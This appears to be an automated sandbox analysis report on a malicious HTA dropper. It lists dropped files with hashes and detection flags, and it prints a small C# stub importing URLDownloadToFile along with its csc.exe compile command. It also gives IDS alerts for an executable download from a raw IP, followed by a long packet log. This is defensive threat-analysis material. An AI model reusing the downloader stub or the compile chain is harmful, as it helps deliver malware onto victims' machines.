                                                                                        Preview:EA06..n..G55...D.S(u.F..H..*tz...M.Q.:..sX.......R..( .....gh.8P...._.\..>.(^j.....Z..S^.Uk.9<.E-...Sym.}&....klJ....5..j.^.Z..3.....5n....p@...S(5..N.H..*Tz.<....$.4..F.......Pm.....M..Ffd.Q..R.A..Tb.G..tiMbi"..ju......p.N.6.*$....U).zH.....c(U......1...V..b..9....3...v.&.L&....KY..........*|7z=b[x..3....7...P.p.T..>.....O..I..H..88p.B..8J.......S..T||.p..U.B@.....M.bh.<?.r.)E..:.O>.)....oO..._.\.I....b.Z.T.4....@..D.3.{...s.8'...@.s2...J.8I@........+`....s5.u.W....=.7s.NjSH.vom.P.]z.V.E..h.zob.V..h....i1..'.z.^..Pi.y..X...TY.^.c.M..Z.2.X...UZ.....Th.....E......ey.S)..mF.U....:/^...[bt.u.s^.\*tJ4.X..:. .B.I..!.j=>3q.J..I..f.Oi.z.F.A.\g4*=b.}...2..0.....R.W._...U.KW..(5i...2.Tr........t.m&.G.S.>.,.`.......J.. .*.:.f...7@...B..(..~I-..).}5FUU.Q.........{.....S,...F...T.5{|V.V..cq...i...*P..F.....5./..E...z..5.S(.:.R_|.Pi.......L.3...{.S).[.V...Ph.0......f....i...nP.._mT..&.Z..(..ThTH..eW.q...5..U.P......`.Nb.:.2....(..T.`...~.z.G..0. .B..M'.8...B.B..

                                                                                        C:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:MSVC .res
                                                                                        Category:dropped
                                                                                        Size (bytes):652
                                                                                        Entropy (8bit):3.108912663958458
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryHak7YnqqjPN5Dlq5J:+RI+ycuZhNFakSjPNnqX
                                                                                        MD5:1DABFAB2474731E05AE055104EC21DDC
                                                                                        SHA1:C4F51B5C7528143A3831B8687B0AB8DF2E20BC17
                                                                                        SHA-256:8D5C9E5A547FE083D1B39F1B3778D45350CBB1EDBC8FCAF64C148ACAF2A988A1
                                                                                        SHA-512:CBB04607928B924A7AEF70934A414C856B564C5F0D0347C20F266C6A19EDEBFB6C52CD43F97EDC171DB46EA0C4010087838A6EF147EB1C6ADFF7C9A0F93A2F27
                                                                                        Malicious:false
                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.k.g.v.u.r.t.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.k.g.v.u.r.t.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                        C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.0.cs

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (359)
                                                                                        Category:dropped
                                                                                        Size (bytes):475
                                                                                        Entropy (8bit):3.641187155285666
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:V/DsYLDS81zui0IdMGlhJhQXReKJ8SRHy4H5RTBN/WSKQy:V/DTLDfuijbOXfHb7u5Qy
                                                                                        MD5:BF77F720153047F3B7F3F9858EA6EC5E
                                                                                        SHA1:1E0701221710CC1D2690A07D7BD4797B05295DE9
                                                                                        SHA-256:A3755788D8B3CFA0B79EEFDE4CE183F038843A8A7EAE4832A756F3351539BE5B
                                                                                        SHA-512:642ADAEBF0F7CF7E176F5EF2186D0E28D244877D1EA496D231EE968D71DD0A377D1F08E0CE1ED7FA92D93F9600286371515EBE6D38DEA20919BBD44FC49AD219
                                                                                        Malicious:false
                                                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace deKyoNd.{. public class rOlSy. {. [DllImport("urlMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr I,string ayRUTt,string quNdpSq,uint BI,IntPtr ohso);.. }..}.

                                                                                        C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):369
                                                                                        Entropy (8bit):5.255618431013431
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fWzxs7+AEszIwkn23fFyA:p37Lvkmb6KRfOWZEifYA
                                                                                        MD5:DD4CFB6A25B80E9ECE76EBC816DA0CDE
                                                                                        SHA1:6875919735D47358E6B556B6F9D4F4D48FDD4ECA
                                                                                        SHA-256:9553E7A29771706FC7EC064C80F2A78D3A81EDDB538F7184153658140C9EC1FD
                                                                                        SHA-512:4FA7DC8E45A61B34134245F21624071271EB7DADE4BDFF54C869D8D8183BE9D58EB63F8B5EB4A9B9B02AF3B004A4C22CF00C3531381EA24743B8D3E28F9D545C
                                                                                        Malicious:true
                                                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.0.cs"

                                                                                        C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):3072
                                                                                        Entropy (8bit):2.8065814665091904
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:etGS29PBu5exl8KVJkZeCRWfqUxftkZfn1BjcUWI+ycuZhNFakSjPNnq:62msx+KvMuqUx+Jn1BA31ulFa3Jq
                                                                                        MD5:0815E50FD83A37B5443F0C5523AF1381
                                                                                        SHA1:410CEE29009AE1A12A2190E603520BE44216D5B7
                                                                                        SHA-256:F90B9696EE98116C88D8EAB359693C56E1D301381AB1F19993CFE819B5BCCE24
                                                                                        SHA-512:7B30A6853A8289CD4B957CC4E07E3E8BE6F89A16E33447AC893E0565A5DABF43A2C268EE97A86291B50D4CAFFE9D9D6BDD9789DE9BEDD943A5462885E7B1BEA9
                                                                                        Malicious:true
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}.g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................5.......m.....m.......................................... <.....P ......N.........T.....V.....].....e.....h...N.....N...!.N.....N.......!.....*.......<.......................................%..........<Module>.dk

                                                                                        C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.out

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):867
                                                                                        Entropy (8bit):5.31284654109926
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:KJBqd3ka6KRfPEifiKax5DqBVKVrdFAMBJTH:Cika6CPEuiK2DcVKdBJj
                                                                                        MD5:695C7321E5A4AFEBA80ED1A2B49E744A
                                                                                        SHA1:8AEA579D11678872B4062FB4291C103DD619EA28
                                                                                        SHA-256:540FE53DEBB4BE835ED85C20BDBFFF9E6693D06DEF632F3C9B264C3BE800BE44
                                                                                        SHA-512:E965C3F59AB085A33EE45EB1A08C21BD595FE5204B3D6FF68872C7D8FAF1983412C9E01F6DAF2FD31DE7504539B2B6FA2E138620271080FFE6438CE32DD5DB5B
                                                                                        Malicious:false
                                                                                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                        C:\Users\user\AppData\Roaming\csoss.exe

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):980992
                                                                                        Entropy (8bit):6.875555651887693
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:/u6J33O0c+JY5UZ+XC0kGso6Fa4aL34eprdWY:Ju0c++OCvkGs9Fa4aL341Y
                                                                                        MD5:54DE0C8E192E7BC71B6D284FFF136296
                                                                                        SHA1:F2AB671CBF4229C9C7EA12F01B148E470B6621E7
                                                                                        SHA-256:D274A8FCA173BF675C950AAD9A3D09EF48DCE2522756BC6BEBA0E08DB8DCFC90
                                                                                        SHA-512:5EE16D7EB2ED2B7CF85225ACC2FDB43144581CA54BB171FE129B5F2ABF5E067D1BFE9472616714BB869C7AC3765CCF22873F56F116BBFA6F1CEE37863D35F258
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...y..g.........."..................}............@..........................`............@...@.......@.....................L...|....p...o.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....o...p...p..................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:HTML document, ASCII text, with very long lines (15812), with CRLF line terminators
                                                                                        Entropy (8bit):2.0916152278723783
                                                                                        TrID:
                                                                                        • HyperText Markup Language (15015/1) 100.00%
                                                                                        File name:needagoodplanforsuccesstogetbackbest.hta
                                                                                        File size:15'981 bytes
                                                                                        MD5:69de66532cc4a0f299ce46f49e150555
                                                                                        SHA1:84d95b6fb113d7751509702c72f017875d4aefd8
                                                                                        SHA256:17bf3cc6ffe8c17c0d724acadc503305ae2fa70ef5571d2303f5c894538a1045
                                                                                        SHA512:285d0be0eb4f938b0c738fb90e1c267a71ff9179fb8f81f5209421287b4ff41bb56a7afe99a0164cb3a5fb89b5d0895d4d8f9b716df52a88c6f462bc04bb761a
                                                                                        SSDEEP:48:3d7FdzH7F7w8zlSYb9AnIsfQ+x99DdeaApCHUFdot7FQ+7FwKpJ4+z397F5PG:DlRXlXe/Q+xf8amCHUo9wgj5+
                                                                                        TLSH:5E72955A5F2CBDC8C3E0FC3989ED6AC1745D137E09C25A01794EB0EE6FDA7149AE8241
                                                                                        File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<sCripT TYPE="TexT/vBSCRIpT">..DIM..............................................................................................................................

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2025-03-17T01:19:04.147044+01002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1123.95.235.2880192.168.2.449724TCP
                                                                                        2025-03-17T01:19:04.240021+01002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2123.95.235.2880192.168.2.449724TCP
                                                                                        2025-03-17T01:19:11.071326+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449725193.122.130.080TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        <
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Mar 17, 2025 01:19:03.662419081 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:03.667259932 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:03.667356014 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:03.667577028 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:03.672365904 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.146908998 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.146922112 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.146941900 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.146951914 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.146964073 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.146975040 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.146991968 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.147005081 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.147008896 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.147022963 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.147041082 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.147043943 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.147077084 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.147100925 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.151865005 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.151878119 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.151889086 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.151901007 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.151952028 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.152004004 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.235150099 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235167980 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235181093 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235275984 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.235306025 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235327005 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235338926 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235349894 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235358953 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.235362053 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235414028 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.235414982 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.235436916 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.235476017 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.236238003 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.236253977 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.236265898 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.236275911 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.236288071 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.236296892 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.236300945 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.236335039 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.236370087 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.237008095 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237019062 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237030983 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237068892 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237070084 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.237082005 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237093925 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237112999 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.237139940 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.237837076 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237848997 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237859964 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.237890005 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.237903118 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.240020990 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.243067980 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.323355913 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323375940 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323395967 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323405981 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323417902 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323429108 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323440075 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323451996 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323462963 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323467970 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.323523045 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.323857069 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323868990 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323880911 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323892117 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323903084 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.323956966 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.323956966 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.324291945 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.324302912 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.324330091 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.324335098 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.324347019 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.324357033 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.324367046 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.324388027 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.324388981 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.324404001 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.324418068 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.324430943 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.324451923 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.324476957 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.325061083 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325073004 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325084925 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325124025 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.325124025 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325136900 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325149059 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325150967 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.325164080 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325174093 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.325196028 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325206995 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.325206995 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.325237036 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.325262070 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.326113939 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326126099 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326137066 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326148033 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326159000 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326169968 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326172113 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.326188087 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326200008 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326211929 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.326215029 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.326244116 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.326261044 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.327013969 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327025890 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327034950 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327071905 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.327079058 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327083111 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.327090979 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327102900 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327112913 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327114105 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.327138901 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327143908 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.327156067 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.327171087 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.327203035 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.328114033 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.328159094 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411513090 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411535978 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411549091 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411561966 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411573887 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411585093 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411602020 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411612988 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411624908 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411637068 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411653042 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411653996 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411663055 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411664963 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411679983 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411691904 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411715984 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411742926 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411753893 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411762953 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411775112 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411786079 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411799908 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411799908 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411818027 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.411940098 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411952019 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.411967993 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412004948 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412014961 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412014961 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412015915 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412028074 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412039042 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412046909 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412071943 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412075996 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412086010 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412098885 CET804972423.95.235.28192.168.2.4
                                                                                        Mar 17, 2025 01:19:04.412113905 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412153959 CET4972480192.168.2.423.95.235.28
                                                                                        Mar 17, 2025 01:19:04.412256956 CET804972423.95.235.28192.168.2.4
